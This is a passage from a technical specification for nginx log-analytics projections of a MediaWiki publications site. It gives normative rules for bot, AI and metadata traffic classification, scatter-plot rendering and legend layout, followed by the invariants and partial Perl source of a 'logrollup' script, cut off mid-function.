This scope depends on the curator's target. When the curator is dealing with a corpus:

  • Projection MUST bind to exactly ONE nginx virtual host at a time.
  • Example: publications.arising.com.au
  • Cross-vhost aggregation is prohibited.

Otherwise the curator will want all vhosts included.

Namespace Exclusions (Mandatory)

Exclude titles with case-insensitive prefix:

  • Special:
  • Category:
  • Category talk:
  • Talk:
  • User:
  • User talk:
  • File:
  • Template:
  • Help:
  • MediaWiki:
  • Obvious misspellings (e.g. Catgeory:) SHOULD be excluded.

Bad Bot Hits

  • Bad bot hits MUST be included for any canonical page resource that survives normalisation and exclusion.
  • Bad bot traffic MUST NOT be excluded solely by agent class; it MAY only be excluded if the request is excluded by namespace or infrastructure rules.
  • badbot_308 SHALL be treated as badbot_GET_redir for scatter projections.
  • Human success ordering (HUMAN_200_304) remains the sole ordering metric; inclusion of badbot hits MUST NOT affect ranking.

metadata hits invariants

  • Within the rollups files the metadata hits are signified by the pattern:
    • (/<dir>-meta/<type>/<rem-path>) where <type> is one of:
      • version
      • diff
      • docid
      • info
  • within the output.tsv (page_list_verify output) metadata accumulated hits are signified by:
    • .$type/<path> e.g.
      • .version/<path>
      • .diff/<path>
      • .docid/<path>
      • .info/<path>

Projection gating invariant:

  • When processing accumulation bins for any projection, NO counts from metadata-identified rows SHALL contribute to any human_* bins.
  • Metadata-identified rows MAY contribute only to the ai_*, bot_*, curlwget_*, and badbot_* bins when agent-attributed, or to the metadata_* bins when unattributed.

Aggregation Invariant (Mandatory)

  • Aggregate across ALL rollup buckets in the selected time span.
  • GROUP BY canonical resource.
  • SUM all numeric <agent>_<METHOD>_<outcome> bins.
  • Each canonical resource MUST appear exactly once.

Metadata Invariants (Mandatory)

  • metadata access SHALL be identified by the paths: /<dir>-meta/<type>/<rem-path>
  • metadata SHALL be attributed to the agent class when the agent string is identifiable as bot, ai, curlwget, or badbot; otherwise it SHALL be attributed to the 'metadata' category bins
  • metadata SHALL be:
    • GROUP BY canonical resource,
    • SUM by numeric <agent>_<METHOD>_<outcome> bins,
    • and each canonical resource MUST appear exactly once.

Human Success Spine (Mandatory)

  • Define ordering metric:
    • HUMAN_200_304 := human_GET_ok + human_GET_redir
  • This metric is used ONLY for vertical ordering.

Ranking and Selection

  • Sort resources by HUMAN_200_304 descending.
  • Select Top-N resources (default N = 50).
  • Any non-default N MUST be declared in run metadata.
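The aggregation, spine metric, and ranking steps can be sketched non-normatively (rank_resources is a hypothetical helper; breaking count ties by resource name is an assumption added here to keep the ordering deterministic):

```python
from collections import defaultdict

def rank_resources(rows, n=50):
    """rows: dicts with 'resource' plus <agent>_<METHOD>_<outcome> bins."""
    totals = defaultdict(lambda: defaultdict(int))
    for row in rows:                        # GROUP BY canonical resource, SUM bins
        for key, val in row.items():
            if key != "resource":
                totals[row["resource"]][key] += val
    def spine(bins):                        # HUMAN_200_304 ordering metric
        return bins.get("human_GET_ok", 0) + bins.get("human_GET_redir", 0)
    ordered = sorted(totals, key=lambda r: (-spine(totals[r]), r))
    return ordered[:n]                      # Top-N, default N = 50
```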

Rendering Invariants (Scatter Plot)

Scatter Plot — anon/metadata Category Invariants (Normative)

The anon/metadata category bucket represents metadata access whose User-Agent cannot be attributed to a bot. This category exposes trawling by agents masquerading as browsers to mimic human traffic. Plotting this bucket as a distinct signal prevents it from masking or contaminating human page readership metrics.

anon/metadata is a derived agent category, separated from human, and is carried in the buckets named metadata_<x>.

anon/metadata is a derived plotting category defined as:

  • All traffic rows in the metadata_<X> buckets
  • anon/metadata acts as an anonymous user agent and MUST NOT be used to reclassify requests into human/ai/bot/curlwget.
  • anon/metadata MUST NOT be inferred from UA strings - it has been determined by the deterministic logrollup prior.

Attributed Agent <dir>-meta metadata

Agent-attributed metadata SHALL be counted in the agent bins in scatter plots.
  • <dir>-meta hits SHALL NOT be excluded from agent aggregated counts

Axes

  • X axis MUST be logarithmic.
  • X axis MUST include log-paper verticals:
    • Major: 10^k (#B0C4DE - Light Steel Blue)
    • Minor: 2..9 × 10^k
  • Y axis lists canonical resources ordered by HUMAN_200_304.

Baseline Alignment

  • The resource label baseline MUST align with human GET_ok.
  • human_GET_ok points MUST NOT have vertical offset from baseline.
  • Draw faint horizontal baseline guides/graticules for each resource row all the way to the tick marks for the category label.
  • Graticules must be rendered before plot so plot symbols overlay any crossing lines.

Category Plotting

  • ALL agent/method/outcome bins present MUST be plotted.
  • No category elision, suppression, or collapsing is permitted.

Plot symbol anti-clutter Separation

  • Anti-clutter SHALL be performed in projected pixel space after log(x) mapping.

Definitions

  • Let P0 be the base projected pixel coordinate of a bin at (x=count, y=row_baseline).
  • Let r_px be the plot symbol radius in pixels derived from the renderer and symbol size.
  • Let d_px := 0.75 × r_px be the base anti-clutter step magnitude.
  • Let overlap_allow_px := 0.75 × r_px be the permitted overlap allowance.
  • Let min_sep_px := 2×r_px − overlap_allow_px be the minimum permitted center-to-center distance between any two symbols.

Ray Set

  • Candidate displacements SHALL lie only on fixed radials.
  • The compliant ray set MUST be fixed and deterministic relative to up=0°, left=270°, right=090°, down=180° (just like compass headings in sailing and aviation):
    • Θ := {60°, 120°, 250°, 300°}
  • No alternative ray set is permitted.
  • Ray iteration order MUST begin at 60° and proceed clockwise in ascending compass heading order over the set of Θ.

Row Band Constraint

  • Any displaced symbol MUST remain within the resource row band:
  • |y_px(candidate) − y_px(row_baseline)| ≤ row_band_px
  • row_band_px MUST be derived deterministically from the row spacing (e.g. 0.45 row units mapped to pixels).

Placement Algorithm

For each resource row:

  • Establish human_GET_ok as the anchor at P0 (k=0).
  • For each remaining bin in deterministic bin-order, attempt placement:
    • First try P0 (no displacement).
    • If placement at P0 violates min_sep_px with any already placed symbol:
    • Attempt placements on radials in ring steps.
  • Ring placements are defined as:
    • P(k, θ) = P0 + k × d_px × u(θ) for integer k ≥ 1 and θ ∈ Θ.
  • For observed small collision counts (≤5), the maximum ring index SHOULD be limited:
    • k_max_default := 1 (i.e. max radial distance ≈ 0.75×r).
  • If collisions exceed the default bound:
    • k_max MAY increase deterministically (e.g. k_max = 2,3,...) until a non-overwriting placement is found.

Chain Expansion (Permissible Escalation)

If no placement is possible within k_max_default, the projector MAY perform chain expansion:

  • The next candidate positions MAY be generated relative to an already placed symbol Pi:
    • P_chain = Pi + d_px × u(θ) for θ ∈ Θ.
  • Chain expansion MUST be deterministic:
    • Always select the earliest-placed conflicting symbol as the chain origin.
    • Always iterate Θ in fixed order.
    • Always bound the search by a deterministic maximum number of attempts.
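A non-normative sketch of the placement search in pixel space, assuming screen coordinates (y increases downward, so compass "up" is negative y). The k_max bound of 3 is illustrative, and chain expansion is reduced here to an explicit failure rather than implemented:

```python
import math

def place_symbols(counts_px, y0, r_px, row_band_px):
    """Deterministic anti-clutter placement; log(x) mapping already applied."""
    d_px = 0.75 * r_px                        # base step magnitude
    min_sep = 2 * r_px - 0.75 * r_px          # 2r minus the overlap allowance
    rays = (60, 120, 250, 300)                # fixed compass-heading ray set
    placed = []
    for x_px in counts_px:                    # bins already in deterministic order
        chosen = None
        for k in range(4):                    # ring 0 is the base position P0
            for theta in (rays if k else (0,)):
                rad = math.radians(theta)
                cand = (x_px + k * d_px * math.sin(rad),   # compass: 0 deg = up
                        y0 - k * d_px * math.cos(rad))
                if abs(cand[1] - y0) > row_band_px:
                    continue                  # row-band constraint violated
                if all(math.dist(cand, p) >= min_sep for p in placed):
                    chosen = cand             # collision test passed
                    break
            if chosen is not None:
                break
        if chosen is None:
            raise RuntimeError("no placement within k_max; chain expansion needed")
        placed.append(chosen)
    return placed
```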

Anti-clutter displacement quantisation (Normative)

  • Baseline definition:
    • For each (title/category) row, the baseline y coordinate is the row’s canonical y index.
    • Any anti-clutter displacement SHALL NOT be rendered on the baseline.
    • Any symbol not rendered exactly on the baseline MUST represent an anti-clutter displacement.
  • Quantisation:
    • Let r be the radius of the HUMAN GET circle symbol in rendered pixel space.
    • All anti-clutter displacements MUST be quantised to the nearest 0.75 × r radial increment in rendered pixel space, radially away from the plot position of a symbol they clashed with.
    • Baseline symbols MUST have y = y0 exactly (no fractional drift).
  • Displacement selection:
    • Candidate displacements MUST be evaluated in pixel space after x-scale transform (log-x) for overlap testing.
    • Once a candidate displacement is selected, the displacement vector magnitude MUST be snapped to the nearest 0.75 × r radial increment (pixel space).
    • If snapping would violate the row-band constraint or cause a collision, the renderer MUST advance to the next candidate (next ray / next ring) rather than emit an unsnapped position.
  • Legibility invariant:
    • A viewer MUST be able to infer “anti-clutter occurred” solely from the quantised y offset (i.e. any non-zero multiple of 0.75 × r relative to the baseline).

Ring Saturation and Radial Progression (Normative)

  • Ring definition:
    • Let r be the HUMAN GET circle symbol radius in rendered pixel space.
    • Let Δ = 0.75 × r.
    • Ring k is defined as the locus of candidate positions at radial distance k × Δ from the baseline symbol position in pixel space.
  • Clustering rule:
    • For a given baseline symbol, anti-clutter displacement candidates SHALL be evaluated ring-by-ring.
    • All angular candidates in ring k MUST be evaluated before any candidate in ring k+1 is considered.
    • The renderer SHALL NOT progress to ring k+1 unless all angular positions in ring k are either:
      • collision-invalid, or
      • row-band invalid.
  • Angular order:
    • Angular candidates within a ring MUST be evaluated in a deterministic, fixed ordering.
    • The angular ordering SHALL remain invariant across renders.
  • Minimal radial expansion invariant:
    • The renderer MUST produce the minimal radial displacement solution that satisfies collision and row-band constraints.
    • No symbol may be placed at ring k+1 if a valid position exists in ring k.
  • Legibility invariant:
    • Increasing radial distance MUST correspond strictly to increased clutter pressure.
    • A viewer MUST be able to infer that symbols closer to the baseline experienced fewer collision constraints than symbols at outer rings.

Bin Ordering for Determinism

  • Within each resource row, bins MUST be processed in a deterministic fixed order prior to anti-clutter placement.
  • A compliant ordering is lexicographic over:
    • (count, agent_order, method_order, outcome_order)
  • The order tables MUST be fixed and normative:
    • agent_order := human, metadata, ai, bot, curlwget, badbot
    • method_order := GET, POST, PUT, HEAD, OTHER
    • outcome_order := ok, redir, client_err, server_err, other/unknown
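The deterministic bin ordering can be sketched non-normatively; ascending count is assumed here, since the direction of the lexicographic ordering is not stated above:

```python
AGENT_ORDER = {a: i for i, a in enumerate(
    ["human", "metadata", "ai", "bot", "curlwget", "badbot"])}
METHOD_ORDER = {m: i for i, m in enumerate(["GET", "POST", "PUT", "HEAD", "OTHER"])}
OUTCOME_ORDER = {o: i for i, o in enumerate(
    ["ok", "redir", "client_err", "server_err", "other"])}

def order_bins(bins):
    """bins: {name: count}; lexicographic over (count, agent, method, outcome)."""
    def key(name):
        agent, method, outcome = name.split("_", 2)   # outcome may contain '_'
        return (bins[name], AGENT_ORDER[agent],
                METHOD_ORDER[method], OUTCOME_ORDER[outcome])
    return sorted(bins, key=key)
```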

Layering and Z-Order

  • Graticules MUST be rendered before plot symbols such that symbols overlay crossing lines.
  • Plot symbols MUST use deterministic z-ordering:
  • grid/graticules < baselines < non-anchor symbols < overlays < anchor symbols
  • human_GET_ok SHALL be rendered as the final layer in its row (highest z-order) when supported by the graphing system.

Two-Panel Label Layout

  • The projection MAY render category labels in a dedicated label panel (left axis) separate from the plotting panel.
  • Label width MUST be computed deterministically from measured rendered text extents.
  • Labels MUST NOT be truncated, abbreviated, or clipped.
  • Baseline guides MUST be continuous across label and plot panels:
    • A faint baseline guide SHALL be drawn in both panels at the same row baseline y.

Run Metadata Declaration

  • The output MUST declare:
    • N (number of resources plotted) and whether it is default Top-N or non-default (ALL).
    • Anti-clutter parameters: r_px, d_px, overlap_allow_px, min_sep_px, Θ, k_max_default, and whether chain expansion was invoked.

Collision Test

A placement is compliant iff for every prior placed symbol center Cj:

  • distance(Ccandidate, Cj) ≥ min_sep_px

Redirect Jitter

  • human_GET_redir MUST NOT receive any fixed vertical offset.
  • human_GET_redir MUST be plotted at the same baseline y as human_GET_ok prior to anti-clutter resolution.
  • Any visual separation between human_GET_redir and other bins MUST be produced only by the Plot symbol anti-clutter Separation rule.
  • Random jitter is prohibited.

Encoding Invariants

Agent Encoding

  • Agent encoded by colour.
  • badbot MUST be red.

Method Encoding

  • GET → o
  • POST → ^
  • PUT → v
  • HEAD → D
  • OTHER → .

Outcome Overlay

  • ok → no overlay
  • redir → diagonal slash (/)
  • client_err → x
  • server_err → x
  • other/unknown → +

Legend Invariants

  • Legend MUST be present.
  • Legend title MUST be exactly: Legend
  • Legend MUST explain:
    • Agent colours
    • Method shapes
    • Outcome overlays
  • Legend MUST NOT overlap resource labels.
  • The legend title MUST be 'Legend' and nothing else

Legend Presence (Mandatory)

  • A legend MUST be rendered on every scatter plot output.
  • The legend title MUST be exactly: Legend
  • A projection without a legend is non-compliant.

Legend Content (Mandatory; Faithful to Encoding Invariants)

The legend MUST include three components:

  1. Agent/metadata key (colour):
    1. human (MUST be #0096FF - Blue )
    2. anon/metadata (MUST be #FFA500 - Orange)
    3. ai (MUST be #008000 - Green)
    4. bot (MUST be #FF69B4 - Hot Pink )
    5. curlwget (MUST be #800080 - Purple )
    6. badbot (MUST be #FF0000 - Red )
  2. Method key (base shapes):
    1. GET → o
    2. POST → ^
    3. PUT → v
    4. HEAD → D
    5. OTHER → .
  3. Outcome overlay key:
    1. x = error (client_err or server_err)
    2. / = redir
    3. + = other (other or unknown)
    4. none = ok

Legend Placement (Mandatory)

  • The legend MUST be placed INSIDE the plotting area.
  • The legend location MUST be bottom-right (axis-anchored):
    • loc = lower right
  • The legend MUST NOT be placed outside the plot area (no RHS external legend).
  • The legend MUST NOT overlap the y-axis labels (resource labels).
  • The legend MUST be fully visible and non-clipped in the output image.

Legend Rendering Constraints (Mandatory)

  • The legend MUST use a frame (boxed) to preserve readability over gridlines/points.
  • The legend frame SHOULD use partial opacity to avoid obscuring data:
    • frame alpha SHOULD be approximately 0.85 (fixed, deterministic).
  • The metadata category is for metadata access not attributed to ai, bot, curlwget, or badbot (the assumption is human, since the hits are acquired from the human counts).
  • Legend ordering MUST be deterministic (fixed order):
    • Agents: human, metadata, ai, bot, curlwget, badbot
    • Methods: GET, POST, PUT, HEAD, OTHER
    • Outcomes: x=error, /=redir, +=other, none=ok

Validation

A compliant scatter output SHALL satisfy:

  • Legend is present.
  • Legend title equals "Legend".
  • Legend is inside plot bottom-right.
  • Legend is non-clipped.
  • Legend contains agent, method, and outcome keys as specified.

Determinism

  • No random jitter.
  • No data-dependent styling.
  • Identical inputs MUST produce identical outputs.

Validation Requirements

  • No duplicate logical pages after canonical folding.
  • HUMAN_200_304 ordering is monotonic.
  • All plotted points trace back to bucket TSV bins.
  • /<x> and /<x-dir> variants MUST fold to the same canonical resource.

Appendix B - logrollup

|title=Appendix Invariants Block B — logrollup Generator (for Appendix Front-Matter)
|author=Ralph B. Holland
|version=1.2.0
|status=normative
|binding=normative and assertable
|anchored=yes

logrollup Generator Invariants (Normative)

Scope

These invariants specify the normative behaviour of the Perl program logrollup that consumes nginx access logs and produces per-bucket TSV rollups. They are intended for inclusion at the front of the logrollup Appendix and describe the generator’s required semantics, including carrier determination for /pub/, /pub-dir/, and /pub-meta.

Temporal and Bucketing Invariants (Normative)

LG-0 — UTC discipline (anti-slop reminder)

Anything involving time is statistically polluted by sloppy programmers. The implementation MUST preserve timezone correctness by using epoch arithmetic for bucketing and by emitting bucket identifiers in Z time.

LG-1 — Deterministic file processing order

Input globs MUST be expanded and then processed in ascending mtime order (oldest → newest) to ensure deterministic accumulation in the presence of overlapping log files.

LG-2 — Pure mathematical bucketing

Time bucketing MUST be purely mathematical:

  • bucket_start = floor(epoch / period_seconds) * period_seconds
  • bucket_end = bucket_start + period_seconds

No “calendar rounding” or localtime heuristics are permitted.
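LG-2's pure mathematical bucketing, together with the Z-time bucket identifier required by LG-0, can be sketched as (function names are illustrative):

```python
import datetime as dt

def bucket_bounds(epoch, period_seconds):
    """Pure mathematical bucketing; no calendar rounding, no localtime."""
    start = (epoch // period_seconds) * period_seconds
    return start, start + period_seconds

def bucket_id(epoch, period_seconds):
    """Bucket identifier emitted in Z (UTC) time from the epoch start."""
    start, _ = bucket_bounds(epoch, period_seconds)
    return dt.datetime.fromtimestamp(start, dt.timezone.utc).strftime(
        "%Y-%m-%dT%H:%M:%SZ")
```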

Classification Invariants (Normative)

LG-3 — badbot is definitive

badbot MUST be detected ONLY by HTTP status = 308. No UA regex and no other status code may classify as badbot.

LG-4 — Wanted agent taxonomy from /etc/nginx/bots.conf

AI and bot classification MUST be derived from /etc/nginx/bots.conf using ONLY patterns that map to "0" (wanted).

Parsing sections is normative:

  • Between '# good bots' and '# AI bots' => BOT patterns
  • Between '# AI bots' and '# unwanted bots' => AI patterns
  • The unwanted-bots section MUST be ignored for analytics classification

Matching policy:

  • badbot(308) takes precedence over all.
  • curl/wget substring match takes precedence after badbot.
  • then AI patterns
  • then BOT patterns
  • else HUMAN
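The matching precedence can be sketched non-normatively; the pattern lists passed in stand for the wanted patterns parsed from /etc/nginx/bots.conf, and case-insensitive matching is an assumption:

```python
import re

def classify(status, user_agent, ai_patterns, bot_patterns):
    """Precedence: badbot(308) > curl/wget > AI > bot > human (LG-3, LG-4)."""
    if status == 308:
        return "badbot"                     # definitive, status only, no UA regex
    ua = user_agent.lower()
    if "curl" in ua or "wget" in ua:
        return "curlwget"
    if any(re.search(p, user_agent, re.I) for p in ai_patterns):
        return "ai"
    if any(re.search(p, user_agent, re.I) for p in bot_patterns):
        return "bot"
    return "human"
```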

LG-5 — Method taxonomy is uniform

All agent categories MUST use the same method buckets:

  • GET, HEAD, POST, PUT, OTHER (everything else).

LG-6 — Status taxonomy is uniform

Status buckets MUST be:

  • ok => 200 or 304
  • redir => 300..399 (except 308 which is badbot)
  • client_err => 400..499
  • other => everything else / malformed

Exclusion Invariants (Normative)

LG-7 — --exclude-local excludes before bucketing

When --exclude-local is enabled:

  • local IP hits MUST be excluded (not counted) before any bucketing and before any aggregation.
  • POST+edit traffic MUST be excluded only within the defined edit window (inclusive bounds), prior to bucketing.

Local IP set is normative for exclusion:

  • 127.0.0.1, ::1,
  • 10.0.0.0/8,
  • 192.168.0.0/16, and
  • 203.217.61.13.

Output Schema Invariants (Normative)

LG-8 — Fixed TSV schema (header + rows)

The TSV output schema MUST be fixed and emitted as a header row, followed by rows.

Column set MUST include all combinations:

  • actors: curlwget, ai, bot, human
  • methods: get, head, post, put, other
  • status: ok, redir, client_err, other

with column names:

  • <actor>_<method>_<status>

and MUST additionally include, in this order after the above counters:

  • badbot_308
  • total_bytes
  • total_hits
  • server_name
  • path

LG-9 — Web-farm safe aggregation keys

Aggregation MUST include:

  • bucket_start + server_name + path

so that no cross-vhost contamination is possible.

Carrier and Canonical Path Invariants (Normative)

LG-10 — Canonical path identity is deterministic

The generator MUST normalise request path identity such that the same resource collates across:

  • absolute URLs (if present), query strings, MediaWiki title carriers, percent encoding policy (decode optional), and trailing slashes,

subject to the constraints below.

LG-11 — Root family derivation (never invent)

The root family MUST be derived only from the request base path (path without query):

  • If base matches ^/([^/]+)-dir/index.php$ then root := "/<root>" lowercased
  • Else if base matches ^/([^/]+)/ then root := "/<root>" lowercased

If root cannot be derived, the implementation MUST NOT invent a different root family.

LG-12 — Title extraction carriers (bound to derived root)

A title MUST be extracted only via these carriers, in precedence order:

(a) Direct title path carrier: base matches ^/<root>/([^/]+)$ => title := that segment
(b) Canonical index carrier: base matches ^/<root>-dir/index.php$ AND query has title=<v> non-empty => title := value(title)
(c) Fallback page carrier: base matches ^/<root>-dir/index.php$ AND query has page=<v> non-empty=> title := value(page)

No other carriers are permitted for title extraction.

LG-13 — Infrastructure / non-title canonicalisation

If no title is extracted, the canonical key MUST be the base path only (query discarded), with:

  • repeated slashes collapsed
  • trailing slash removed unless the path is exactly "/"

This ensures /pub-dir/load.php and /pub-dir/images/... remain infrastructure identities and do not collide with /pub/<Title>.

LG-14 — Title canonicalisation rules

After title extraction, the following canonicalisation MUST be applied:

  • '_' replaced by space
  • en-dash/em-dash (–, —) replaced by ASCII '-'
  • collapse whitespace runs to single spaces
  • trim leading/trailing whitespace

No additional title rewriting is permitted.

LG-15 — Meta-access classification for /pub-meta (precedence preserved)

Meta-access classification MUST apply only when base ends with /index.php (case-insensitive), and MUST follow this precedence:

1) if query has docid non-empty => meta_class := "docid"
2) else if query has diff non-empty => meta_class := "diff"
3) else if query has oldid non-empty => meta_class := "version"
4) else if query has action=history => meta_class := "history"

5) else meta_class := "" (no meta)

LG-16 — Canonical key construction (/pub/, /pub-meta/)

If meta_class is empty: canonical_key := /<root>/<canonical_title>

If meta_class is non-empty: canonical_key := /<root>-meta/<meta_class>/<canonical_title>

For publications:

  • /pub/<Title> (page access)
  • /pub-meta/diff/<Title> (diff access)
  • /pub-meta/version/<Title> (oldid access)
  • /pub-meta/history/<Title> (history access)
  • /pub-meta/docid/<Title> (docid access)
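LG-12 through LG-16 can be sketched together for the /pub root family (non-normative; query handling is simplified to first-value-wins):

```python
import re
from urllib.parse import parse_qs

def canonical_key(base, query):
    """Sketch of carrier extraction, meta classification and key construction."""
    q = {k: v[0] for k, v in parse_qs(query).items()}
    meta, title = "", None
    m = re.match(r"^/pub/([^/]+)$", base)              # LG-12 (a): direct carrier
    if m:
        title = m.group(1)
    elif re.match(r"^/pub-dir/index\.php$", base, re.I):
        title = q.get("title") or q.get("page")        # LG-12 (b) then (c)
        # LG-15 precedence (index.php only): docid > diff > oldid > action=history
        if q.get("docid"):
            meta = "docid"
        elif q.get("diff"):
            meta = "diff"
        elif q.get("oldid"):
            meta = "version"
        elif q.get("action") == "history":
            meta = "history"
    if not title:                                      # LG-13: infrastructure key
        return re.sub(r"/{2,}", "/", base).rstrip("/") or "/"
    title = title.replace("_", " ").replace("\u2013", "-").replace("\u2014", "-")
    title = re.sub(r"\s+", " ", title).strip()         # LG-14 canonicalisation
    return f"/pub-meta/{meta}/{title}" if meta else f"/pub/{title}"   # LG-16
```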

LG-17 — Query stripping rule

Except for extracting title and meta_class as above, the query string MUST NOT participate in canonical identity. All other query parameters MUST be ignored for identity (i.e., dropped).

Auditability Invariants (Normative)

LG-18 — bots.conf parsing is auditable

When --verbose is enabled, the program MUST report to STDERR the wanted patterns identified as "good AI agent" and "good bot" so that the classification basis is externally auditable.

logrollup perl code (2026-02-22)

#!/usr/bin/env perl
use strict;
use warnings;
use IO::Uncompress::Gunzip qw(gunzip $GunzipError);
use Time::Piece;
use Getopt::Long;
use File::Path qw(make_path);
use File::Spec;
# use URI::Escape qw(uri_unescape);

# History:
# 2026-02-22 ralph   - the model placed the agent string into the mapath for some stupid reason. These models are bizarre
# 2026-02-22 ralph   - instantiated governance lens and metrics and then instructed the model to place unattributed metadata access in its own bucket
# 2026-02-13 ralph   - accumulate wire size for bandwidth and rate calculations
# 2026-02-05 ralph   - epoch was wrong because the machine stripped off Z; included invariant 0 as a reminder
# 2026-02-02 ralph   - local IP is 192.168.0.0/16 and 203.217.61.13
# 2026-01-22 chatgpt - the machine wrote this code from some invariant

#title: CM-bucket-rollup invariants
#
#invariants (normative):
#  0. Anything involving time is statistically polluted in the LLM corpus by sloppy programmers
#     * processing must occur in UTC and epoch seconds must be used to avoid slop
#     * nginx logs thus emit Z time
#     * rollups should work in Z time as well
#     * localtime for systems engineering problems is evil
#  1. server_name is first-class; never dropped; emitted in output schema and used for optional filtering.
#  2. input globs are expanded then processed in ascending mtime order (oldest -> newest).
#  3. time bucketing is purely mathematical: bucket_start = floor(epoch/period_seconds)*period_seconds.
#  4. badbot is definitive and detected ONLY by HTTP status == 308; no UA regex for badbot.
#  5. AI and bot are derived from /etc/nginx/bots.conf:
#     - only patterns mapping to 0 are "wanted"
#     - between '# good bots' and '# AI bots' => bot
#     - between '# AI bots' and '# unwanted bots' => AI_bot
#     - unwanted-bots section ignored for analytics classification
#  6. output TSV schema is fixed (total/host/path last; totals are derivable):
#       curlwget|ai|bot|human|metadata × (get|head|post|put|other) × (ok|redir|client_err|other)
#       badbot_308
#       total_bytes total_hits server_name path
#  7. Path identity is normalised so the same resource collates across:
#       absolute URLs, query strings (incl action/edit), MediaWiki title=, percent-encoding, and trailing slashes.
#  8. --exclude-local excludes (does not count) local IP hits and POST+edit hits in the defined window, before bucketing.
#  9. web-farm safe: aggregation keys include bucket_start + server_name + path; no cross-vhost contamination.
# 10. bots.conf parsing must be auditable: when --verbose, report "good AI agent" and "good bot" patterns to STDERR.
# 11. method taxonomy is uniform for all agent categories: GET, HEAD, POST, PUT, OTHER (everything else).
# 12. metadata is accumulated separately for unattributed agents in parallel to human access (which is also not attributed to agents)
#     This is the parallel of human access buckets for the Access Lifetime Graphlet projections described in Publications Access Graphs.

my $cmd = $0;

# -------- options --------
my ($EXCLUDE_LOCAL, $VERBOSE, $HELP, $OUTDIR, $PERIOD, $SERVER) = (0,0,0,".","01:00","");

GetOptions(
    "exclude-local!" => \$EXCLUDE_LOCAL,
    "verbose!"       => \$VERBOSE,
    "help!"          => \$HELP,
    "outdir=s"       => \$OUTDIR,
    "period=s"       => \$PERIOD,
    "server=s"       => \$SERVER,   # optional filter; empty means all
) or usage();
usage() if $HELP;

sub usage {
    print <<"USAGE";
Usage:
  $cmd [options] /var/log/nginx/access.log*

Options:
  --exclude-local   Exclude local IPs and POST edit traffic
  --outdir DIR      Directory to write TSV outputs
  --period HH:MM    Period size (duration), default 01:00
  --server NAME     Only count hits where server_name == NAME (web-farm filter)
  --verbose         Echo processing information + report wanted agents from bots.conf
  --help            Show this help and exit

Output:
  One TSV per time bucket, named:
    YYYY_MM_DDThh_mm-to-YYYY_MM_DDThh_mm.tsv

Columns (server/page last; totals derivable):
  (curlwget|ai|bot|human|metadata) × (get|head|post|put|other) × (ok|redir|client_err|other)
  badbot_308
  total_bytes
  total_hits
  server_name
  path
USAGE
    exit 0;
}

make_path($OUTDIR) unless -d $OUTDIR;

# -------- period math (no validation, per instruction) --------
my ($PH, $PM) = split(/:/, $PERIOD, 2);
my $PERIOD_SECONDS = ($PH * 3600) + ($PM * 60);

# -------- edit exclusion window --------
my $START_EDIT = Time::Piece->strptime("12/Dec/2025:00:00:00 +1100", "%d/%b/%Y:%H:%M:%S %z");
my $END_EDIT   = Time::Piece->strptime("01/Jan/2026:23:59:59 +1100", "%d/%b/%Y:%H:%M:%S %z");

# -------- parse bots.conf (wanted patterns only) --------
my $BOTS_CONF = "/etc/nginx/bots.conf";
my (@AI_REGEX, @BOT_REGEX);
my (@AI_RAW, @BOT_RAW);

open my $bc, "<", $BOTS_CONF or die "$cmd: cannot open $BOTS_CONF: $!";
my $mode = "";
while (<$bc>) {
    if (/^\s*#\s*good bots/i)      { $mode = "GOOD"; next; }
    if (/^\s*#\s*AI bots/i)        { $mode = "AI";   next; }
    if (/^\s*#\s*unwanted bots/i)  { $mode = "";     next; }

    next unless $mode;
    next unless /~\*(.+?)"\s+0;/;
    my $pat = $1;

    if ($mode eq "AI") {
        push @AI_RAW,  $pat;
        push @AI_REGEX, qr/$pat/i;
    } elsif ($mode eq "GOOD") {
        push @BOT_RAW,  $pat;
        push @BOT_REGEX, qr/$pat/i;
    }
}
close $bc;

if ($VERBOSE) {
    for my $p (@AI_RAW)  { print STDERR "[agents] good AI agent: ~*$p\n"; }
    for my $p (@BOT_RAW) { print STDERR "[agents] good bot: ~*$p\n"; }
}

# -------- helpers --------
sub is_local_ip {
    my ($ip) = @_;
    return 1 if $ip eq "127.0.0.1" || $ip eq "::1";
    return 1 if $ip =~ /^10\./;
    return 1 if $ip =~ /^192\.168\./;
    return 1 if $ip eq "203.217.61.13";  # my public IP address
    return 0;
}

sub agent_class {
    my ($status, $ua) = @_;
    return "badbot" if $status == 308;
    return "curlwget" if defined($ua) && $ua =~ /\b(?:curl|wget)\b/i;
    $ua //= '';
    for (@AI_REGEX)  { return "ai"  if $ua =~ $_ }
    for (@BOT_REGEX) { return "bot" if $ua =~ $_ }
    return "human";
}

# Canonicalise unattributed User-Agent strings for the metadata bucket.
# Goal: stable collation across trivial whitespace variance while preserving
#       distinguishability of agent families.
sub canon_ua {
    my ($ua) = @_;
    $ua //= '';
    $ua =~ s/\t/ /g;
    $ua =~ s/\s+/ /g;
    $ua =~ s/^\s+|\s+$//g;
    $ua = '(empty)' if $ua eq '';
    # Hard cap to keep TSV rows sane (nginx UA can be unbounded).
    $ua = substr($ua, 0, 200) if length($ua) > 200;
    return "ua:$ua";
}

sub method_bucket {
    my ($m) = @_;
    return "head" if $m eq "HEAD";
    return "get"  if $m eq "GET";
    return "post" if $m eq "POST";
    return "put"  if $m eq "PUT";
    return "other";
}

sub status_bucket {
    my ($status) = @_;
    return "other" unless defined($status) && $status =~ /^\d+$/;
    return "ok"         if $status == 200 || $status == 304;
    return "redir"      if $status >= 300 && $status <= 399;  # 308 handled earlier as badbot
    return "client_err" if $status >= 400 && $status <= 499;
    return "other";
}

# Function: normalise_path
# Status: UPDATED (meta-access aware)
# Normative basis: Appendix B — logrollup Meta-Access Classification Invariants
# Backward compatibility: preserves prior behaviour for non-meta access
#
# This replaces the previous normalise_path implementation.
# Old behaviour (for diff):
#   - rewrite index.php?title=X → /<root>/X
#   - drop query entirely
#
# Behaviour:
#   - canonicalises infrastructure/non-title resources deterministically
#   - extracts titles from /<root>/<title> OR /<root>-dir/index.php?... (title/page carriers)
#   - encodes meta-access under /<root>/<root>-meta/<meta_class>/<canonical_title>
#   - drops query in all other cases

sub normalise_path {
    my ($raw_path) = @_;

    # 1) Split the raw URL into base and query segments
    my ($base, $qs) = split(/\?/, $raw_path, 2);

    # 2) Scrub the base: drop stray tabs and any fragment
    $base =~ s/\t//g;
    $base =~ s/#.*$//;

    $qs //= '';

    # 3) Parse query string (deterministic; last-key-wins)
    my %q;
    if ($qs ne '') {
        for my $pair (split /[&;]/, $qs) {
            my ($k, $v) = split /=/, $pair, 2;
            next unless defined $k && $k ne '';
            $v //= '';
            $q{lc $k} = $v; # uri_unescape($v);
        }
    }

    # 4) Derive root family from request (never invent)
